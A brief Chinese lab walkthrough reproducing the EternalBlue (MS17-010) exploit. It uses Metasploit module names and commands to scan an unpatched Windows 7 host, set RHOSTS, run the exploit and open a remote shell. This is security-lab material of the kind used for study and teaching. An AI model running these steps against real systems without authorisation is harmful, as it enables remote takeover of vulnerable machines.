一、实验环境:没有补丁的win7作为目标机器
Kali作为攻击机器
二、实验步骤
1.首先进入root用户,输入msfconsole进入msf6端
2.利用命令search ms17-010搜索ms17-010漏洞脚本,得到四种不同的模块
3.先使用脚本中的扫描模块,即第三个,输入命令 use auxiliary/scanner/smb/smb_ms17_010
4. 查看配置表,show options,可以看到此时RHOSTS是空的
5.我们需要对RHOSTS进行配置,输入被攻击的目标IP,运行一下,可以看到目标机器可能存在永恒之蓝漏洞
6.继续使用脚本中的攻击模块,使用命令use exploit/windows/smb/ms17_010_eternalblue
7. 查看配置表,继续对RHOSTS进行配置
8.运行一下,可以看到连接建立成功,漏洞复现成功。
输入shell,可直接进入目标机器的cmd,输入exit可返回metepreter端